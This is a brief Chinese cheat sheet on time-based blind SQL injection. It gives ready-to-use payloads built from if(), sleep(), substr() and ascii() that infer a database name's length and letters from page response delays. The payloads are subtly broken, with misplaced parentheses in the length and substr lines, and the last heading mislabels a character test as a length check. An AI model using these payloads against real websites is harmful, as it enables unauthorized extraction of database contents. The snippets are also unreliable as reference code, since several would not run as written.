时间盲注
典型应用场景:Web页面只有一种返回结果。
注入方式:利用插入的SQL语句造成时间延迟,若延迟函数被成功执行(即页面反应时 间加长),则所查询的信息正确。
判断数据库长度
注意:若要查找数据库其他信息,将命令下的select database()整体替换。
and if((length(database()=8)),sleep(5),1)--+
判断数据库名(字母逐个盲猜)
注意:若要查找数据库其他信息,将命令下的select database()整体替换。
and if((substr((select database())),1,1)='s'),sleep (2),1)--+
判断数据库长度(ascii值判断)
注意:若要查找数据库其他信息,将命令下的select database()整体替换。
and if ((ascii(substr((select database()),1,1))>80),sleep(3),1)--+